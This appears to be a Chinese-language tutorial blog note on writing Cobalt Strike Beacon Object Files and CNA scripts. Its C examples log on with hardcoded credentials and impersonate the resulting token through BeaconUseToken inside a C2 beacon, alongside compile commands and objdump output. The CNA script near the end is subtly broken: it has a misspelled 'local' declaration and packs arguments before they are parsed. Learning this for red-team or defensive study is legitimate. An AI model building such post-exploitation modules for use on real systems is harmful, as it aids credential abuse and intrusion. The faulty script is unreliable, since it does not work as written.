CobaltStrike-BOF

状态: 进行中

【TOC】手牵手学习如何编写CobaltStrike-BOF及对应的cna脚本

环境

linux

MinGW-w64

通过包管理器安装MinGW-w64

sudo apt-get install -y *-w64-x86-*

wget https://www.cobaltstrike.com/downloads/beacon.h

一般c程序(不准确)

#include <windows.h>
INT main() {
	HANDLE LogonHandle;
	if (LogonUserA("admin", "localhost", "1qaz!QAZ", LOGON32_LOGON_INTERACTIVE, LOGON32_PROVIDER_DEFAULT, &LogonHandle) != 0)
	{
		CloseHandle(LogonHandle);
	}
	return 0;
}

修改为Beacon Object File识别的格式

从MinGW头文件中搜索声明头文件

┌──(kali㉿kali)-[/usr/share/mingw-w64/include]
└─$ cd /usr/share/mingw-w64/include    
                                                                                                                               
┌──(kali㉿kali)-[/usr/share/mingw-w64/include]
└─$ grep -r " LogonUserA" .        
./winbase.h:  WINADVAPI WINBOOL WINAPI LogonUserA (LPCSTR lpszUsername, LPCSTR lpszDomain, LPCSTR lpszPassword, DWORD dwLogonType, DWORD dwLogonProvider, PHANDLE phToken);

获取的声明函数,函数名称前加上此函数的导入库ADVAPI32$,KERNEL32$,具体查看msdn

WINADVAPI WINBOOL WINAPI ADVAPI32$LogonUserA (LPCSTR lpszUsername, LPCSTR lpszDomain, LPCSTR lpszPassword, DWORD dwLogonType, DWORD dwLogonProvider, PHANDLE phToken);
WINBASEAPI DWORD WINAPI KERNEL32$GetLastError (VOID);
WINBASEAPI WINBOOL WINAPI KERNEL32$CloseHandle (HANDLE hObject);
#include <windows.h>
#include "beacon.h"
WINADVAPI WINBOOL WINAPI ADVAPI32$LogonUserA (LPCSTR lpszUsername, LPCSTR lpszDomain, LPCSTR lpszPassword, DWORD dwLogonType, DWORD dwLogonProvider, PHANDLE phToken);
WINBASEAPI DWORD WINAPI KERNEL32$GetLastError (VOID);
WINBASEAPI WINBOOL WINAPI KERNEL32$CloseHandle (HANDLE hObject);

void go(char * args, int alen) {
	HANDLE LogonHandle;
	if (ADVAPI32$LogonUserA("admin", "localhost", "1qaz!QAZ", LOGON32_LOGON_INTERACTIVE, LOGON32_PROVIDER_DEFAULT, &LogonHandle)){
		BeaconPrintf(CALLBACK_OUTPUT, "LogonSuccess!");
		KERNEL32$CloseHandle(LogonHandle);
	}else{
		BeaconPrintf(CALLBACK_ERROR, "Error:%d", KERNEL32$GetLastError());
	}				
}
┌──(kali㉿kali)-[~/Bof]
└─$ x86_64-w64-mingw32-gcc -c bofdemo.c -o bofdemo.x64.o     #64位编译   
x86_64-w64-mingw32-gcc -m32 -c bofdemo.c -o bofdemo.x86.o     #32位编译                                                         1 ⨯
                                                                                                                               
┌──(kali㉿kali)-[~/Bof]
└─$ x86_64-w64-mingw32-objdump -s bofdemo.x64.o         

bofdemo.x64.o:     file format pe-x86-64

Contents of section .text:
 0000 554889e5 4883ec40 48894d10 89551848  UH..H..@H.M..U.H
 0010 8d45f848 89442428 c7442420 00000000  .E.H.D$(.D$ ....
 0020 41b90200 00004c8d 05000000 00488d15  A.....L......H..
 0030 09000000 488d0d13 00000048 8b050000  ....H......H....
 0040 0000ffd0 85c07427 488d1519 000000b9  ......t'H.......
 0050 00000000 488b0500 000000ff d0488b45  ....H........H.E
 0060 f84889c1 488b0500 000000ff d0eb2148  .H..H.........!H
 0070 8b050000 0000ffd0 4189c048 8d152700  ........A..H..'.
 0080 0000b90d 00000048 8b050000 0000ffd0  .......H........
 0090 904883c4 405dc390 90909090 90909090  .H..@]..........
Contents of section .rdata:
 0000 3171617a 2151415a 006c6f63 616c686f  1qaz!QAZ.localho
 0010 73740061 646d696e 004c6f67 6f6e5375  st.admin.LogonSu
 0020 63636573 73210045 72726f72 3a256400  ccess!.Error:%d.
Contents of section .xdata:
 0000 01080305 08720403 01500000           .....r...P..    
Contents of section .pdata:
 0000 00000000 97000000 00000000           ............    
Contents of section .rdata$zzz:
 0000 4743433a 2028474e 55292031 302d7769  GCC: (GNU) 10-wi
 0010 6e333220 32303231 30313130 00000000  n32 20210110....

┌──(kali㉿kali)-[~/Bof]
└─$ x86_64-w64-mingw32-objdump -r bofdemo.x64.o

bofdemo.x64.o:     file format pe-x86-64

RELOCATION RECORDS FOR [.text]:
OFFSET           TYPE              VALUE 
0000000000000029 R_X86_64_PC32     .rdata
0000000000000030 R_X86_64_PC32     .rdata
0000000000000037 R_X86_64_PC32     .rdata
000000000000003e R_X86_64_PC32     __imp_ADVAPI32$LogonUserA
000000000000004b R_X86_64_PC32     .rdata
0000000000000057 R_X86_64_PC32     __imp_BeaconPrintf
0000000000000067 R_X86_64_PC32     __imp_KERNEL32$CloseHandle
0000000000000072 R_X86_64_PC32     __imp_KERNEL32$GetLastError
000000000000007e R_X86_64_PC32     .rdata
000000000000008a R_X86_64_PC32     __imp_BeaconPrintf

RELOCATION RECORDS FOR [.pdata]:
OFFSET           TYPE              VALUE 
0000000000000000 rva32             .text
0000000000000004 rva32             .text
0000000000000008 rva32             .xdata
inline-execute /home/kali/Bof/bofdemo.x64.o

账号密码错误,打印错误码

Untitled

Internal APIs

BeaconUseToken

使用当前句柄权限,使用用户句柄需要以System权限运行

#include <windows.h>
#include "beacon.h"
WINADVAPI WINBOOL WINAPI ADVAPI32$LogonUserA (LPCSTR lpszUsername, LPCSTR lpszDomain, LPCSTR lpszPassword, DWORD dwLogonType, DWORD dwLogonProvider, PHANDLE phToken);
WINBASEAPI DWORD WINAPI KERNEL32$GetLastError (VOID);
WINBASEAPI WINBOOL WINAPI KERNEL32$CloseHandle (HANDLE hObject);

void go(char * args, int alen) {
	HANDLE LogonHandle;
	if (ADVAPI32$LogonUserA("admin1", "localhost", "1qaz!QAZ", LOGON32_LOGON_INTERACTIVE, LOGON32_PROVIDER_DEFAULT, &LogonHandle)){
		BeaconUseToken(LogonHandle); //使用当前会话句柄权限
		BeaconPrintf(CALLBACK_OUTPUT, "LogonSuccess!UseTheHandle.");
		KERNEL32$CloseHandle(LogonHandle);
	}else{
		BeaconPrintf(CALLBACK_ERROR, "Error:%d", KERNEL32$GetLastError());
	}				
}

Untitled

rev2self回到初始令牌

Untitled

CNA与BOF一起使用

# $1 = beacon ID
# $2 = DOMAIN\user
# $3 = password
alias bofdemo{
	# maybe example
	lcoal('$handle $ data $args');
	
	# open BOF file and read 
	$handle = openf(script_resource("bofdemo.x64.o"));
	$data	= readb($handle,-1);
	closef($handle);
	
	# set args
	$args = bof_pack($1,"zzz",$domain,$user,$pass);
	
	# check arguments
	if (size(@_) != 3){
		berror($1,"bofdemo:args error");
		return;
	}
	
	# parse args
	($domain , $user) = split('\\\\', $2);
	$pass = $3;
	
	
	# run a BOF
	beacon_inline_execute($1,$data,"go",$args);
	
	# announce to user
	btask($1,"create token as $2");

}
#include <windows.h>
#include "beacon.h"
WINADVAPI WINBOOL WINAPI ADVAPI32$LogonUserA (LPCSTR lpszUsername, LPCSTR lpszDomain, LPCSTR lpszPassword, DWORD dwLogonType, DWORD dwLogonProvider, PHANDLE phToken);
WINBASEAPI DWORD WINAPI KERNEL32$GetLastError (VOID);
WINBASEAPI WINBOOL WINAPI KERNEL32$CloseHandle (HANDLE hObject);

void go(char * args, int alen) {
	HANDLE LogonHandle;
	//data parser
	datap parser;
	char * domain;
	char * user;
	char * pass;
	
	BeaconDataParse(&parser, args, alen);
	domain = BeaconDataExtract(&parser,NULL);
	user = BeaconDataExtract(&parser,NULL);
	pass = BeaconDataExtract(&parser,NULL);
	
	
	if (ADVAPI32$LogonUserA(user, domain, pass, LOGON32_LOGON_INTERACTIVE, LOGON32_PROVIDER_DEFAULT, &LogonHandle)){
		BeaconPrintf(CALLBACK_OUTPUT, "LogonSuccess!");
		BeaconUseToken(LogonHandle);
		KERNEL32$CloseHandle(LogonHandle);
	}else{
		BeaconPrintf(CALLBACK_ERROR, "Error:%d", KERNEL32$GetLastError());
	}				
}

Untitled

comments powered by Disqus